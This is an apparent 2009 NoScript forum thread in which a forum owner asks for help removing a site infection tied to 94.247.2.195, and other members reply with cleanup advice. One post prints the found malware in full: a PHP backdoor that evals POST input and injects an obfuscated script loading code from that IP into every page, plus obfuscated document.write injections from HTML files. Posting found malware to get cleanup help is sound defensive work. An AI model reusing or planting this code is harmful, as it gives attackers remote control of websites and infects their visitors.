I did what you suggested and everything appears to be working OK.
Another question.
NoScript, options, white list.
Would it be a good idea or can't hurt to go through list every so often to remove sites I might never to back and visit?
And reason being just to clean up list a bit.
Or on sites I haven't been to in over say some predetermine time automatically deleted or text turns red.
thanks
94.247.2.195
-
- Posts: 19
- Joined: Wed Apr 15, 2009 2:19 pm
Re: 94.247.2.195
firefox 3.0.8, thunderbird 2.0.0.21, VZ um175 broadband, XP home SP3 2gig
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.9) Gecko/2009040821 Firefox/3.0.9
-
- Ambassador
- Posts: 1586
- Joined: Fri Mar 20, 2009 4:47 am
- Location: Colorado, USA
Re: 94.247.2.195
It's not necessary but can't hurt. I do that occasionally during my OCD moments. Sometimes I accidentally remove a needed third-party helper site, but it's easily whitelisted again when its needed.informactive wrote:Would it be a good idea or can't hurt to go through list every so often to remove sites I might never to back and visit?
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.9) Gecko/2009040821 Firefox/3.0.9
-
- Posts: 19
- Joined: Wed Apr 15, 2009 2:19 pm
Re: 94.247.2.195
OK.
It would be nice of NoScript knew when I was going to have an OCD moment and do it for me with a single check box however I'll do in my OCD moments.
It would be nice of NoScript knew when I was going to have an OCD moment and do it for me with a single check box however I'll do in my OCD moments.
firefox 3.0.8, thunderbird 2.0.0.21, VZ um175 broadband, XP home SP3 2gig
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.9) Gecko/2009040821 Firefox/3.0.9
- GµårÐïåñ
- Lieutenant Colonel
- Posts: 3365
- Joined: Fri Mar 20, 2009 5:19 am
- Location: PST - USA
- Contact:
Re: 94.247.2.195
Well it seems like I missed all the action on this one, go figure, but it seems you resolved it and it was already suggested that you got injected. So good luck and now maybe I will get the followup posts.
~.:[ Lï£ê ï§ å Lêmðñ åñÐ Ì Wåñ† M¥ Mðñê¥ ßå¢k ]:.~
________________ .: [ Major Mike's ] :. ________________
________________ .: [ Major Mike's ] :. ________________
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.0.9) Gecko/2009040821 Firefox/3.0.9 AdblockPlus/1.0.2 RequestPolicy/0.5.5 NoScript/1.9.2.1
-
- Posts: 1
- Joined: Tue Apr 28, 2009 10:58 am
Re: 94.247.2.195
I also have my forum infected http://wisebets.org .
I got some help from my hosting company, and they found the code in the following files:
Also I found the following code in almost all my files:
I removed it manually from all I could find, and now the forum is working fine except the posting part. When I try to post on the forum it`s getting slow and tries to connect to 94.247.2.195 (before I removed the code it was trying to connect to this IP from anypage) . But I already searched the code in ALL files (manually) and cound`t find it anymore, even if it`s still there.
Any ideas where it may be ?
Also, anyone has a suggestion of how to protect against it so that won`t happen again ?
Thanks in advance.
I got some help from my hosting company, and they found the code in the following files:
Code: Select all
config.php:
<?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCmRvY3VtZW50LndyaXRlKHVuZXNjYXBlKCdPWFElM0NzSXB2Y3J6WUZpcHpZRnQlMjBzcjZ2R2MlM0QlMkYlMkY5NCUyRTI0ellGNyUyRW1zbzJJcHYlMkUxOTVuMyUyRk9YUWpJcHZxdWVyeSUyRWpzbXNvJTNFJTNDNnZHJTJGc0lwdmNyaXB0bGklM0UnKS5yZXBsYWNlKC9saXxhUXw2dkd8ellGfE9YUXxtc298RGZ8bjN8SXB2L2csIiIpKTsKIC0tPjwvc2NyaXB0Pg=='));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?><?php
index.php:
<?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCmRvY3VtZW50LndyaXRlKHVuZXNjYXBlKCdPWFElM0NzSXB2Y3J6WUZpcHpZRnQlMjBzcjZ2R2MlM0QlMkYlMkY5NCUyRTI0ellGNyUyRW1zbzJJcHYlMkUxOTVuMyUyRk9YUWpJcHZxdWVyeSUyRWpzbXNvJTNFJTNDNnZHJTJGc0lwdmNyaXB0bGklM0UnKS5yZXBsYWNlKC9saXxhUXw2dkd8ellGfE9YUXxtc298RGZ8bjN8SXB2L2csIiIpKTsKIC0tPjwvc2NyaXB0Pg=='));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?><?php
postinfo.html:
document.write(unescape('OXQ%3CsIpvcrzYFipzYFt%20sr6vGc%3D%2F%2F94%2E24zYF7%2Emso2Ipv%2E195n3%2FOXQjIpvquery%2Ejsmso%3E%3C6vG%2FsIpvcriptli%3E').replace(/li|aQ|6vG|zYF|OXQ|mso|Df|n3|Ipv/g,""));
_vti_inf.html:document.write(unescape('OXQ%3CsIpvcrzYFipzYFt%20sr6vGc%3D%2F%2F94%2E24zYF7%2Emso2Ipv%2E195n3%2FOXQjIpvquery%2Ejsmso%3E%3C6vG%2FsIpvcriptli%3E').replace(/li|aQ|6vG|zYF|OXQ|mso|Df|n3|Ipv/g,""));
Code: Select all
<script language=javascript><!-- document.write(unescape('OXQ%3CsIpvcrzYFipzYFt%20sr6vGc%3D%2F%2F94%2E24zYF7%2Emso2Ipv%2E195n3%2FOXQjIpvquery%2Ejsmso%3E%3C6vG%2FsIpvcriptli%3E').replace(/li|aQ|6vG|zYF|OXQ|mso|Df|n3|Ipv/g,"")); -->
Any ideas where it may be ?
Also, anyone has a suggestion of how to protect against it so that won`t happen again ?
Thanks in advance.
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.9) Gecko/2009040821 Firefox/3.0.9
Re: 94.247.2.195
Again. First you have to determine if it is your website or host that is (initially) being exploited.
The .php - who is responsible for that? You or your host. If you, fix it. If your hosting company, have them fix it.
noscript, 94.247.2.195 and malwarebytes
Has my website been hacked?
The .php - who is responsible for that? You or your host. If you, fix it. If your hosting company, have them fix it.
noscript, 94.247.2.195 and malwarebytes
Has my website been hacked?
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.19) Gecko/20110420 SeaMonkey/2.0.14 Pinball NoScript FlashGot AdblockPlus
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.21) Gecko/20090403 SeaMonkey/1.1.16
- GµårÐïåñ
- Lieutenant Colonel
- Posts: 3365
- Joined: Fri Mar 20, 2009 5:19 am
- Location: PST - USA
- Contact:
Re: 94.247.2.195
There might be an import reference to an external file, check all your imports and links in the documents to external JS.
~.:[ Lï£ê ï§ å Lêmðñ åñÐ Ì Wåñ† M¥ Mðñê¥ ßå¢k ]:.~
________________ .: [ Major Mike's ] :. ________________
________________ .: [ Major Mike's ] :. ________________
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.0.9) Gecko/2009040821 Firefox/3.0.9 AdblockPlus/1.0.2 RequestPolicy/0.5.5 NoScript/1.9.2.2